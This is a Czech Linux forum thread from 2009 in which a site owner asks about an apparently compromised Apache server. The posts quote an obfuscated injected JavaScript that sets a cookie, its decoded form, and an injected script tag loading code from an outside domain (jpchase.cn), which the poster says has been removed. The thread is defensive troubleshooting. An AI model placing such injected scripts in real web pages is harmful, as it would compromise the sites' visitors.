abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 17:55 | Komunita

    Na čem aktuálně pracují vývojáři GNOME a KDE? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE.

    Ladislav Hagara | Komentářů: 0
    7.6. 14:55 | IT novinky

    Před 70 lety, 7. června 1954, ve věku 41 let, zemřel Alan Turing, britský matematik, logik, kryptoanalytik a zakladatel moderní informatiky.

    Ladislav Hagara | Komentářů: 7
    7.6. 11:44 | Zajímavý software

    NiceGUI umožňuje používat webový prohlížeč jako frontend pro kód v Pythonu. Zdrojové kódy jsou k dispozici na GitHubu pod licencí MIT.

    Ladislav Hagara | Komentářů: 1
    7.6. 10:55 | Nová verze

    Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána ve verzi 2024.6. Z novinek lze vypíchnout lepší integraci LLM (OpenAI, Google AI, Ollama) nebo podporu Matter 1.3.

    Ladislav Hagara | Komentářů: 0
    6.6. 20:55 | IT novinky

    IKEA ve Spojeném království hledá zaměstnance do své nové pobočky. Do pobočky v počítačové hře Roblox. Nástupní mzda je 13,15 liber na hodinu.

    Ladislav Hagara | Komentářů: 0
    6.6. 10:44 | Zajímavý článek

    Alyssa Rosenzweig se v příspěvku na svém blogu Vulkan 1.3 na M1 za 1 měsíc rozepsala o novém Vulkan 1.3 ovladači Honeykrisp pro Apple M1 splňujícím specifikaci Khronosu. Vychází z ovladače NVK pro GPU od Nvidie. V plánu je dále rozchodit DXVK a vkd3d-proton a tím pádem Direct3D, aby na Apple M1 s Asahi Linuxem běžely hry pro Microsoft Windows.

    Ladislav Hagara | Komentářů: 41
    6.6. 01:00 | Nová verze

    Byla vydána (𝕏) květnová aktualizace aneb nová verze 1.90 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a animovanými gify v poznámkách k vydání. Ve verzi 1.90 vyjde také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.

    Ladislav Hagara | Komentářů: 0
    6.6. 00:44 | Nová verze

    Byla vydána (Mastodon, 𝕏) nová verze 2024.2 linuxové distribuce navržené pro digitální forenzní analýzu a penetrační testování Kali Linux (Wikipedie). Přehled novinek se seznamem nových nástrojů v oficiálním oznámení.

    Ladislav Hagara | Komentářů: 0
    5.6. 16:44 | IT novinky

    Počítačová hra Tetris slaví 40 let. Alexej Pažitnov dokončil první hratelnou verzi 6. června 1984. Mezitím vznikla celá řada variant. Například Peklo nebo Nebe. Loni měl premiéru film Tetris.

    Ladislav Hagara | Komentářů: 10
    5.6. 10:44 | Nová verze

    MicroPython (Wikipedie), tj. implementace Pythonu 3 optimalizovaná pro jednočipové počítače, byl vydán ve verzi 1.23.0. V přehledu novinek je vypíchnuta podpora dynamických USB zařízení nebo nové moduly openamp, tls a vfs.

    Ladislav Hagara | Komentářů: 0
    Rozcestník

    Dotaz: Pavděpodobně napadený Apache

    18.9.2009 16:18 leninzprahy | Praha
    Pavděpodobně napadený Apache
    Přečteno: 515×

    Chci se poradit, jestli se někdo s něčím podobným nesetkal, než začnu urgovat správce serveru.

    Nepravidelně se stává, že při přístupu na web běžícím na jednom serveru se místo požadovaného obsahu vrátí jen krátký javascript:

    <script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n\x5f\x73e\x73\x73\x5f\x69\x64\x3d\x38dbd07\x33\x64c24b\x64\x378\x32\x31c\x33\x35\x34\x332\x37\x35\x33032ef\x62"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+lclbi.toGMTString( ); </script>

    Dekódované je to:

    <script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n_sess_id=8dbd073dc24bd7821c35432753032efb; path=/; expires="+lclbi.toGMTString( ); </script>

    Občas je to k vidění např. na http://www.smaltovna.cz/ ale stejně se chovají další weby na stejném serveru jak už jsem psal.

    Kdysi jsme řešily podobný problém a při googlení jsem narazil na dokument http://bt.uptime.cz/apache/apache_attack_EN.pdf který něco takového popisuje, ale toto mi přijde trochu jiné.

    Na dotaz "n_sess_id" google mlčí, proto se ptám zde. Server sdělí akorát verzi Apache/2.0.5.

    Soubory webu se zadjí být nezměněny, problém s ukradenýmy hesly z TCM jsme už řešili, toto bude něco jiného.

    Máte někdo s podobnými problémy nějaké zkušenosti? Předem děkuju za jakoukoliv odpověď.

    Připomínám že nejsem správcem serveru, mám jen ftp přístup, jde o osobní zvědavost a o to, co správci napsat (kromě "Máš to rozbitý" :-) )

    zahrádka a pivo jsou nejlepší v léťe, rum v zimě

    Odpovědi

    18.9.2009 17:37 ycuzo | skóre: 3
    Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

    Len tak cisto zo zaujmu som pozrel na tu stranku smaltovna.cz a ejhle,cista prazdna strana mrknem na zdrojak a ten javascript je tam,pri reloade uz isla stranka normalne. Pozrel som zdrojak stranok,prve mi padlo do oci nejaky javascript co sa natahuje s nejakeho cinskeho servevera a potom este nejaky emonitor.cz alebo co,nemoze byt chyba tam ? Neskusal si najprv odmazat tie javascripty a tak skusat ci sa objavy ta zahada ? Sice sa v javascripte moc nevyznam ani ho nemam rad,ale tenot kus kodu mi nejak pripomina skor akesi pocitanie statistiky,alebo nieco podobne...

    H0ax avatar 18.9.2009 18:14 H0ax | skóre: 36 | blog: Odnikud_nikam
    Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache
    podívej se na "ps -e" a hledej proces s podobným jménem jako tohle: dse84abzw1abzw1 nebo podobný
    uid=0(root) gid=0(root) skupiny=0(root)
    18.9.2009 18:34 leninzprahy | Praha
    Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

    Díky za nápady, vloženého

    <!-- ad --><script type="text/javascript" src="http://jpchase.cn/js.js"></script><!-- /ad -->
    

    na začátku body a

    <meta name="verify-v1" content="52mbi00Wp0KQDBlEVaghU25iPjp3aQoCBGLS+fpVd68=" />
    

    v hlavičce jsem si nevšiml (odstraněno), bohužel ostatní weby jsou bez toho ale se stejným problémem.

    Běžící procesy si prohlédnout nemůžu, mám jen ftp přístup, ale přesměruji nápad adminovi.

    Díky

     

    zahrádka a pivo jsou nejlepší v léťe, rum v zimě
    19.9.2009 19:27 ycuzo | skóre: 3
    Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

    Este tam mas jednu malu dekorativnu chybku :)

    </html><script>check_content()</script> a nemas ukoncene </body>

     

    21.10.2009 10:48 Jirka
    Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache
    Ahoj,

    mám úplně stejný problém a chtěl bych se zeptat, jestli se ti jej podařilo vyřešit. Píšu přímo sem, neboť jsem na tebe nenašel kontakt. Už to řeším pěkně dlouho, admin mi napsal, že je chyba v mé aplikaci, ale týden ji hledám, loguji co se dá a nemůžu tu díru najít.

    Díky za jakoukoliv radu, Jirka

    blackj (a) seznam cz

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.